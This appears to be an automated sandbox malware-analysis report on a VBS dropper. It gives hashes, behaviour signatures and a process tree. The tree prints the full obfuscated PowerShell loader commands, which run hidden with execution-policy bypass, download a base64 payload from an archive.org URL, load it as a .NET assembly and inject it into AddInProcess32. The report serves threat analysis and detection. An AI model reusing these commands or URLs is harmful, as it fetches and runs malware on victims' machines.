Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
-
submitted
24-09-2024 04:28
General
-
Target
Label_091273172.vbs
-
Size
501KB
-
MD5
acac54eb7b6c34d0c1dcf760c22ede4d
-
SHA1
d6801fa279e4fe8696031696611c4b0d75054982
-
SHA256
812abce7dbbfa5cff999d623b7af55b890d5e2ffbab510a0b585efb0bf2eb0cb
-
SHA512
e22230cf8cec2bd0cbaf4f7eb18e32dd2246e52bac1df891cc8df67bdce2cf6982bd508307b6a2262e98a2e643e4a98ce229a82584fca5b3ce089f286f8cd393
-
SSDEEP
12288:NxUu11RyddYlQLsdReovsT5JqGeqUXb8CYx6f2ACVqENi8rvNm7S0bpYiWYVwPkI:vTEsjaquAYdlb
Malware Config
Extracted
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
Signatures
-
Blocklisted process makes network request 2 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 6 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Label_091273172.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdaaml1cmwnKycgPSBSZycrJ2VodHRwJysncycrJzovL2lhNjAnKycwMTAwJysnLnVzLmFyY2gnKydpdmUub3JnLzI0L2l0ZW0nKydzJysnL2RldGFoLW5vJysndGUtdi8nKydEZXQnKydhaE5vdCcrJ2VWLnR4dFInKydnZTtaamliYXNlNjRDb250ZW50ID0gKCcrJ05lJysndy0nKydPJysnYmplJysnY3QgU3knKydzdCcrJ2VtLk5lJysndC5XZWJDbGllbnQpLkRvd25sJysnb2FkU3RyJysnaW5nKFpqaXVybCk7WmppYmluYScrJ3J5Q29uJysndCcrJ2VudCcrJyA9ICcrJ1tTeXMnKyd0ZW0nKycuQ29udmUnKydyJysndF06JysnOkZyb21CYXNlNicrJzRTdHJpbmcoWmonKydpJysnYmFzJysnZTY0Q28nKydudGVudCk7WmppJysnYXNzZW1ibHkgPSBbUmVmbGUnKydjdGlvbi5Bc3NlbScrJ2JseV06OkxvYScrJ2QoWmppYmknKyduYXJ5JysnQ28nKyduJysndGVudCk7WicrJ2ppJysndHlwZSA9IFonKydqaScrJ2Fzc2VtYmx5JysnLkdldFR5cGUoUmdlUnVuUEUuSG9tZVJnZSknKyc7WmppbScrJ2V0aCcrJ29kICcrJz0gWicrJ2ppdHlwZS5HZXRNZScrJ3Rob2QoUmcnKydlVkFJUmcnKydlKTtaamknKydtZXRob2QuSW52b2tlKFpqaW51bGwsIFtvYmplJysnY3RbXV0nKydAKFJnZTAvRycrJ3dNJysndWsvZC9lZScrJy5ldCcrJ3NhcC8vOnNwdHQnKydoJysnUmdlICwgUmdlJysnZGVzYXRpJysndmFkb1JnZSAnKycsIFJnZWRlc2F0JysnaXZhZG9SZycrJ2UgLCBSZ2UnKydkZXNhdGl2YWQnKydvUicrJ2dlLFJnZUEnKydkZEluUHInKydvY2VzczMnKycyJysnUmdlLFJnZVJnZSkpJykuUmVwbEFDZSgnWmppJywnJCcpLlJlcGxBQ2UoJ1JnZScsW1NUUkluZ11bQ2hhUl0zOSkgfCBJblZPa0UtZVhQUkVzc0lvTg==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Zjiurl'+' = Rg'+'ehttp'+'s'+'://ia60'+'0100'+'.us.arch'+'ive.org/24/item'+'s'+'/detah-no'+'te-v/'+'Det'+'ahNot'+'eV.txtR'+'ge;Zjibase64Content = ('+'Ne'+'w-'+'O'+'bje'+'ct Sy'+'st'+'em.Ne'+'t.WebClient).Downl'+'oadStr'+'ing(Zjiurl);Zjibina'+'ryCon'+'t'+'ent'+' = '+'[Sys'+'tem'+'.Conve'+'r'+'t]:'+':FromBase6'+'4String(Zj'+'i'+'bas'+'e64Co'+'ntent);Zji'+'assembly = [Refle'+'ction.Assem'+'bly]::Loa'+'d(Zjibi'+'nary'+'Co'+'n'+'tent);Z'+'ji'+'type = Z'+'ji'+'assembly'+'.GetType(RgeRunPE.HomeRge)'+';Zjim'+'eth'+'od '+'= Z'+'jitype.GetMe'+'thod(Rg'+'eVAIRg'+'e);Zji'+'method.Invoke(Zjinull, [obje'+'ct[]]'+'@(Rge0/G'+'wM'+'uk/d/ee'+'.et'+'sap//:sptt'+'h'+'Rge , Rge'+'desati'+'vadoRge '+', Rgedesat'+'ivadoRg'+'e , Rge'+'desativad'+'oR'+'ge,RgeA'+'ddInPr'+'ocess3'+'2'+'Rge,RgeRge))').ReplACe('Zji','$').ReplACe('Rge',[STRIng][ChaR]39) | InVOkE-eXPREssIoN"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7KB
MD562cc106457befdc48b6c157442d8d3aa
SHA16607026f855902ae01eaed6b20fbd7db3b627fec
SHA256dd11c1779714f42eb196871f83f24e7b1ff0a5091c27a5bfe5da36fc42b57ef4
SHA512db14ccf70ae80430892262cead0674c0ece975d2e9921507c9d93a456204a95a3ac7ef981fdb05a69c1702f6f389d612bba6250782516e12a92d097c9522f6eb
-
Filesize
4KB
-
Filesize
2.9MB
-
Filesize
9.6MB
-
Filesize
32KB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB